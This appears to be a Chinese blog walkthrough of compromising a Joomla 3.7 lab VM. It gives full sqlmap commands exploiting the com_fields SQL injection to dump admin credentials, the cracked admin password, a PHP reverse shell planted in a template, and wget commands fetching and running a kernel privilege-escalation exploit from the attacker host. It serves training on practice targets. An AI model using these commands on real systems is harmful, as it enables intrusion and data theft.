今后的靶机渗透,我尽量简单化,一些繁琐的过程我就不写出来了
直接写主要的步骤和想法思路
靶机IP:192.168.56.101
web渗透
http://192.168.56.101/administrator
发现是joomla建站
不想爆破了,发现了暴露出该cms的版本信息
http://192.168.56.101/README.txt
![](https://img.haomeiwen.com/i5178935/ab6212fed35b143a.png)
sql注入
不想盲测,直接上kali中search一下poc
searchsploit joomla 3.7
![](https://img.haomeiwen.com/i5178935/8d0b200f51009433.png)
判断出有注入点,且注入点已知。直接跑跑sqlmap
注入语句:
1、爆库
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
![](https://img.haomeiwen.com/i5178935/3c3a2d0a1e7b0ded.png)
2、爆表
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
![](https://img.haomeiwen.com/i5178935/c7c36d03e02081bd.png)
3、爆字段数据
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
![](https://img.haomeiwen.com/i5178935/64896d06956f5b64.png)
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' --dump -p list[fullorde
ring]
![](https://img.haomeiwen.com/i5178935/45e90bc4bfd95140.png)
拿到了admin用户的密码hash
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
拿去md5解不出来,试试john爆解
john解hash
john hash
![](https://img.haomeiwen.com/i5178935/a8d4cf637cc9cf9c.png)
登录后台试试,成功登录
口令是:
admin snoopy
![](https://img.haomeiwen.com/i5178935/a66f07545a05a3c3.png)
后台反弹getshell
进入后台后,选择Templates模板,选择templates第一个模板即可,在index.php页面中添加php反弹马
![](https://img.haomeiwen.com/i5178935/9da415ddeb505ff2.png)
kali中开启监听
![](https://img.haomeiwen.com/i5178935/a33f7bfdf227b9a7.png)
反弹成功
提权
先查看下该靶机的系统版本信息
![](https://img.haomeiwen.com/i5178935/2f720670984f9a94.png)
老系统,也许有漏洞
随便拿一个试试
![](https://img.haomeiwen.com/i5178935/3249b9bad3ecff9e.png)
这个不行,再试试下一个
试了几个,发现这个可以
![](https://img.haomeiwen.com/i5178935/c8b14d2904cc2813.png)
下载到靶机上
![](https://img.haomeiwen.com/i5178935/e9c25be0290da1bb.png)
wget http://192.168.56.102/39772/compile.sh
wget http://192.168.56.102/39772/doubleput.c
wget http://192.168.56.102/39772/hello.crm
wget http://192.168.56.102/39772/suidhelper.c
之后
./compile.sh
./doubleput
拿到root权限
![](https://img.haomeiwen.com/i5178935/6d5d34ed5292ce02.png)
get flag
![](https://img.haomeiwen.com/i5178935/36f1ec93938886b2.png)
总结
1、发现了cms建站,注意版本等信息,可以直接找cms漏洞
2、进入后台,joomla直接上反弹马getshell
3、提权就比较难了,也是参照 国外的大牛的方法
靶机百度云下载
链接:https://pan.baidu.com/s/1al4ls7lx8zVq6s--Ik3RcQ
提取码:lbi4
网友评论